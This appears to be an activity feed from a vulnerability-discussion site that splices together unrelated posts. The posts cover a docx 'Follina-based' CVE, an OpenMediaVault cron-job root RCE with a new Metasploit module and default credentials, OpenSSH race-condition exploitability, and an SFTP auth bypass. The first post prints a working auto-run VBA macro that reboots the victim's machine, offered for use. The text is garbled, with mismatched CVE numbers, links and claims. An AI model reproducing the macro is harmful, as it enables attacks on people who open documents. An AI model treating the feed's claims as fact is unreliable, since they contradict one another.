Activity Feed

CVE-2024-30104

The problem is still in the “docx” files this vulnerability is a 0 day based on the Follina exploit. The Microsoft company still doesn’t want to understand, that they MUST remove macros options from the 365 Office and their offline app. In this video, you will see an example of this, how some users can be trickery to open the malicious file that is sent to them by the attacker. After execution of the file, the thing will be very bad for the users who execute it on their computer. It depends of the scenario.

The exploit:

Sub AutoOpen()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "shutdown /R"
TaskID = Shell(Program, 1)
If Err <> 0 Then
MsgBox "Can't start " & Program
End If
End Sub

• Enjoy watching
  

Source:

link

PoC:

video

While this vulnerability is interesting, and it certainly has the potential for immense damage and harm, the reality is far more nuanced. The difficulty in exploiting this vulnerability is significant, and will likely have to generate a lot of noise from the attacker. It takes a matter of hours (the quickest to date has been around 4 hours under lab conditions) to successfully exploit, which a lot of traffic and noise that for the most part will not go unnoticed if an organisation has the appropriate monitoring in place.

In addition, this is a not vulnerable on numerous LTS base Operating Systems such as:

• RHEL (and thus CentOS) 6, 7, 8 (https://access.redhat.com/security/cve/CVE-2024-6387)
  
• Ubuntu bionic, focal, trusty (https://access.redhat.com/security/cve/CVE-2024-6387)

This is a golden oldie, that never has been fixed. The existing module in Metasploit , exploit/multi/http/openmediavault_cmd_exec works only on versions in the range 0.4.x
Unfortunately the vulnerability still exists within all OpenMediaVault versions starting from from 0.5 until the recent release 7.4.2-2 and it allows an authenticated user to create and run cron jobs as root on the system.
I have created a new Metasploit module that can handle all targets from versions 0.1 and above. Shodan shows more then 10000 vulnerable instances and hundreds of them still have the default admin:openmediavault credentials configured which allows an attacker to leverage this exploit.

This module has been successfully tested on:

OpenMediaVault x64 appliances:

• openmediavault_0.2_amd64.iso
  
• openmediavault_0.2.5_amd64.iso
  
• openmediavault_0.3_amd64.iso
  
• openmediavault_0.4_amd64.iso
  
• openmediavault_0.4.32_amd64.iso
  
• openmediavault_0.5.0.24_amd64.iso
  
• openmediavault_0.5.48_amd64.iso
  
• openmediavault_1.9_amd64.iso
  
• openmediavault_2.0.13_amd64.iso
  
• openmediavault_2.1_amd64.iso
  
• openmediavault_3.0.2-amd64.iso
  
• openmediavault_3.0.26-amd64.iso
  
• openmediavault_3.0.74-amd64.iso
  
• openmediavault_4.0.9-amd64.iso
  
• openmediavault_4.1.3-amd64.iso
  
• openmediavault_5.0.5-amd64.iso
  
• openmediavault_5.5.11-amd64.iso
  
• openmediavault_5.6.13-amd64.iso
  
• openmediavault_6.0-16-amd64.iso
  
• openmediavault_6.0-34-amd64.iso
  
• openmediavault_6.0-amd64.iso
  
• openmediavault_6.0.24-amd64.iso
  
• openmediavault_6.5.0-amd64.iso
  
• openmediavault_7.0-20-amd64.iso
  
• openmediavault_7.0-32-amd64.iso
  

ARM64 on Raspberry PI running Kali Linux 2024-3:

• openmediavault 7.3.0-5
  
• openmediavault 7.4.2-2
  

VirtualBox Images (x64):

• openmediavault 0.4.24
  
• openmediavault 0.5.30
  
• openmediavault 1.0.21
  

You can download the iso images from here.

Mitigation

There is no fix available to address this vulnerability. This weakness has been there since 2013 and never fixed. Future releases will probably not fix it. Contacted the lead developer, but did not get any response. The only precaution that you can take is to ensure that you change the default admin credentials. It is not forced, so you need to take the action yourself.

References

CVE-2013-3632
Packetstorm Public Exploit
Metasploit Module – OpenMediaVault authenticated RCE
OpenMediaVault ISO Downloads

TL;DR: Neat! Doesn’t sound like something that’s going to be easily exploited or automated in pretty much any scenario, so I have little initial concern about widespread exploitation, or even exploitation at all. I’d expect a long tail of follow-on patches as various distros/products patch it out. Patch, sure, but no need for panic as far as we can tell.

As usual, happy to be proven wrong, but from the (very good!) Qualys technical write-up, this is a memory corruption bug where an adversary would have to win a race condition to exploit it successfully. The Qualys write-up even explicitly notes that “In our experiments, it takes ~10,000 tries on average to win this race condition; i.e., with 10 connections (MaxStartups) accepted per 120 seconds (LoginGraceTime), it takes ~1-2 days on average to obtain a remote root shell.”

Based on our AttackerKB Rapid7 Analysis, I have rated the exploitability as high, as an exploit can easily be implemented by modifying an existing SFTP library to trigger the auth bypass. However, when running the exploit, the attacker must first know the username of a valid user account on the target server. I have rated the attacker value as very high, as this is an auth bypass in an SFTP service of an enterprise file transfer solution.